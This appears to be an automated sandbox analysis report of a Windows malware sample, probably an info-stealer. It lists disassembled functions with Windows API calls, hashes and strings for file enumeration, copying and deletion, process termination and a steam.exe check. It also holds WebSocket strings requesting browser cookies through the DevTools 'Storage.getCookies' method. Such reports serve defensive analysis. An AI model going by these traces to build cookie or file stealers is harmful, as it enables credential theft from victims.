                                • Opcode ID: 0a63a3b7616628f402e8b8559fdf8e5e1c7060fe3a62d50f40f44103e7414a75
                                • Instruction ID: d76add854eb1aa3c63b46f295010a20d8c86a8f4f5030b7aea29948225182412
                                • Opcode Fuzzy Hash: 0a63a3b7616628f402e8b8559fdf8e5e1c7060fe3a62d50f40f44103e7414a75
                                • Instruction Fuzzy Hash: A78191719002589BCB20EFA4DD89FEE7779BF84300F004998B51AA7191DF34AE48CFA1
                                Function 009B16B9 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 219stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B16E2
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B1719
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B176C
                                • lstrcat.KERNEL32(00000000), ref: 009B1776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B17A2
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B18F3
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009B18FE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat
                                • String ID: \*.*
                                • API String ID: 2276651480-1173974218
                                • Opcode ID: 6c91744e76eeb8d68dd8128f2ecd8f7679e4167ab4f577432b54e82de874c220
                                • Instruction ID: ae6a13416ffa96a6b8bc46178f8515eae99b75add4e81f4f683586bf39110b6e
                                • Opcode Fuzzy Hash: 6c91744e76eeb8d68dd8128f2ecd8f7679e4167ab4f577432b54e82de874c220
                                • Instruction Fuzzy Hash: 1381813191025A9BCB21EFA8DBD9BEE77B9EF84721F540124F805AB291CB30DD05CB91
                                Function 009CDD30 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 171stringfilememoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 009CDD45
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009CDD4C
                                • wsprintfA.USER32 ref: 009CDD62
                                • FindFirstFileA.KERNEL32(?,?), ref: 009CDD79
                                • StrCmpCA.SHLWAPI(?,009E17A0), ref: 009CDD9C
                                • StrCmpCA.SHLWAPI(?,009E17A4), ref: 009CDDB6
                                • wsprintfA.USER32 ref: 009CDDD4
                                • DeleteFileA.KERNEL32(?), ref: 009CDE20
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 009CDDED
                                  • Part of subcall function 009B1530: lstrcpy.KERNEL32(00000000,?), ref: 009B1557
                                  • Part of subcall function 009B1530: lstrcpy.KERNEL32(00000000,?), ref: 009B1579
                                  • Part of subcall function 009B1530: lstrcpy.KERNEL32(00000000,?), ref: 009B159B
                                  • Part of subcall function 009B1530: lstrcpy.KERNEL32(00000000,?), ref: 009B15FF
                                  • Part of subcall function 009CD980: memset.MSVCRT ref: 009CD9A1
                                  • Part of subcall function 009CD980: memset.MSVCRT ref: 009CD9B3
                                  • Part of subcall function 009CD980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 009CD9DB
                                  • Part of subcall function 009CD980: lstrcpy.KERNEL32(00000000,?), ref: 009CDA0E
                                  • Part of subcall function 009CD980: lstrcat.KERNEL32(?,00000000), ref: 009CDA1C
                                  • Part of subcall function 009CD980: lstrcat.KERNEL32(?,010CED38), ref: 009CDA36
                                  • Part of subcall function 009CD980: lstrcat.KERNEL32(?,?), ref: 009CDA4A
                                  • Part of subcall function 009CD980: lstrcat.KERNEL32(?,010CD1A8), ref: 009CDA5E
                                  • Part of subcall function 009CD980: lstrcpy.KERNEL32(00000000,?), ref: 009CDA8E
                                  • Part of subcall function 009CD980: GetFileAttributesA.KERNEL32(00000000), ref: 009CDA95
                                • FindNextFileA.KERNEL32(00000000,?), ref: 009CDE2E
                                • FindClose.KERNEL32(00000000), ref: 009CDE3D
                                • lstrcat.KERNEL32(?,010CF3C8), ref: 009CDE66
                                • lstrcat.KERNEL32(?,010CDB70), ref: 009CDE7A
                                • lstrlen.KERNEL32(?), ref: 009CDE84
                                • lstrlen.KERNEL32(?), ref: 009CDE92
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CDED2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                                • String ID: %s\%s$%s\*
                                • API String ID: 4184593125-2848263008
                                • Opcode ID: 7d86d0e8d97d96d6a1394e1523443dfde474414eb38d4f4a4de99cb70d7500e0
                                • Instruction ID: d37a11b0a92459d8518082913c2dea82fc852d7f342c2a3b2332a6c30b6f90f9
                                • Opcode Fuzzy Hash: 7d86d0e8d97d96d6a1394e1523443dfde474414eb38d4f4a4de99cb70d7500e0
                                • Instruction Fuzzy Hash: AD615471910248ABCB21EFB4DD89BDE7779FF88310F4045A8B50AA7291DF34AE44CB91
                                Function 009CD530 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 183stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 009CD54D
                                • FindFirstFileA.KERNEL32(?,?), ref: 009CD564
                                • StrCmpCA.SHLWAPI(?,009E17A0), ref: 009CD584
                                • StrCmpCA.SHLWAPI(?,009E17A4), ref: 009CD59E
                                • lstrcat.KERNEL32(?,010CF3C8), ref: 009CD5E3
                                • lstrcat.KERNEL32(?,010CF418), ref: 009CD5F7
                                • lstrcat.KERNEL32(?,?), ref: 009CD60B
                                • lstrcat.KERNEL32(?,?), ref: 009CD61C
                                • lstrcat.KERNEL32(?,009E1794), ref: 009CD62E
                                • lstrcat.KERNEL32(?,?), ref: 009CD642
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CD682
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CD6D2
                                • FindNextFileA.KERNEL32(00000000,?), ref: 009CD737
                                • FindClose.KERNEL32(00000000), ref: 009CD746
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                                • String ID: %s\%s
                                • API String ID: 50252434-4073750446
                                • Opcode ID: 529f66d5517d468f74f1e75e9edddc059bc42ca1ddf1bb01cb73c5249d701cdd
                                • Instruction ID: be3a769c208603b3795c8b88d6e09fc1480fbb4fe48c3e2be7976f716fa1e122
                                • Opcode Fuzzy Hash: 529f66d5517d468f74f1e75e9edddc059bc42ca1ddf1bb01cb73c5249d701cdd
                                • Instruction Fuzzy Hash: A1616371D102599BCB20EFB4DD88ADE77B8EF88310F0085A9E549A7251DF34AE45CF90
                                Function 009D48B0 Relevance: 16.1, APIs: 4, Strings: 6, Instructions: 1129COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_
                                • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                                • API String ID: 909987262-758292691
                                • Opcode ID: 6bf6ff42c3114bc730cebc9b67582a4b60130a0093d690547c0a8aaf5ace98f9
                                • Instruction ID: 694183377434e8bcf8d0f1a119bb6fc9d499309424b9f7bb84f109a90242d35f
                                • Opcode Fuzzy Hash: 6bf6ff42c3114bc730cebc9b67582a4b60130a0093d690547c0a8aaf5ace98f9
                                • Instruction Fuzzy Hash: 58A25771D412699FDF20CFA8C9807EDBBB6AF88300F1585AAE519A7341DB705E85CF90
                                Function 009C23A9 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 106stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C23D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C23F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C2402
                                • lstrlen.KERNEL32(\*.*), ref: 009C240D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C242A
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 009C2436
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C246A
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 009C2486
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: \*.*
                                • API String ID: 2567437900-1173974218
                                • Opcode ID: 111ecb86be92bc0b0e4be662033784d7d7e695293492864c660029f280f6e3b0
                                • Instruction ID: 98606858b87a0c67d31a6de9fa03ebe5d42015c22dc0cba74ef6adc082488d0d
                                • Opcode Fuzzy Hash: 111ecb86be92bc0b0e4be662033784d7d7e695293492864c660029f280f6e3b0
                                • Instruction Fuzzy Hash: 274183305102459BCB32EF68DF85BDE77B9EF94715F005128F84AAB2A1CF309C458B91
                                Function 00D77CDB Relevance: 14.0, Strings: 10, Instructions: 1550COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: hf>$(S7$,o[$5`$n$6Amw$<^~$PlR$V|o$r{%$GO
                                • API String ID: 0-3304821587
                                • Opcode ID: e1cd75ca2cc1008167274ae658112f66325e24735c94460db6c507e503899704
                                • Instruction ID: 7cd4c62c742a53c2a38f6f3f9d35ca7a249f47372ace2407dbb555c311a779ed
                                • Opcode Fuzzy Hash: e1cd75ca2cc1008167274ae658112f66325e24735c94460db6c507e503899704
                                • Instruction Fuzzy Hash: 39B204F390C2049FE304AE2DEC8567ABBE9EF94720F16892DE6C587744E63598418793
                                Function 009D46A0 Relevance: 13.6, APIs: 9, Instructions: 54processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 009D46B9
                                • Process32First.KERNEL32(00000000,00000128), ref: 009D46C9
                                • Process32Next.KERNEL32(00000000,00000128), ref: 009D46DB
                                • StrCmpCA.SHLWAPI(?,?), ref: 009D46ED
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009D4702
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 009D4711
                                • CloseHandle.KERNEL32(00000000), ref: 009D4718
                                • Process32Next.KERNEL32(00000000,00000128), ref: 009D4726
                                • CloseHandle.KERNEL32(00000000), ref: 009D4731
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                • String ID:
                                • API String ID: 3836391474-0
                                • Opcode ID: 366e680d8f076f45a4e3fbb562b42cc6d03c396a3f0733c022d19e49fc0fe778
                                • Instruction ID: 2a6dbb3e6fdcee00581d93cff081f947e19278be8710dc0fa44dd2e69952efdb
                                • Opcode Fuzzy Hash: 366e680d8f076f45a4e3fbb562b42cc6d03c396a3f0733c022d19e49fc0fe778
                                • Instruction Fuzzy Hash: 0F01F531641164ABE7209B60DCCCFFE377CEB49B11F000199F909EB280EF7499848BA4
                                Function 009D4610 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 009D4628
                                • Process32First.KERNEL32(00000000,00000128), ref: 009D4638
                                • Process32Next.KERNEL32(00000000,00000128), ref: 009D464A
                                • StrCmpCA.SHLWAPI(?,steam.exe), ref: 009D4660
                                • Process32Next.KERNEL32(00000000,00000128), ref: 009D4672
                                • CloseHandle.KERNEL32(00000000), ref: 009D467D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                • String ID: steam.exe
                                • API String ID: 2284531361-2826358650
                                • Opcode ID: 26d53ef631f7a1c16c26d06405eae96f776da5521db83643fa14b701837c143c
                                • Instruction ID: 57ef816242910d5c47569c6b4873d437e1fee6803dacb437e294aedcdd8b9dbc
                                • Opcode Fuzzy Hash: 26d53ef631f7a1c16c26d06405eae96f776da5521db83643fa14b701837c143c
                                • Instruction Fuzzy Hash: 7A01A271601124ABD720EB60AC88FEA77BCEF09751F4401D6F909D6140EF74C9988BE5
                                Function 009C4B29 Relevance: 12.1, APIs: 8, Instructions: 102stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C4B51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C4B74
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C4B7F
                                • lstrlen.KERNEL32(009E4CA8), ref: 009C4B8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C4BA7
                                • lstrcat.KERNEL32(00000000,009E4CA8), ref: 009C4BB3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C4BDE
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 009C4BFA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
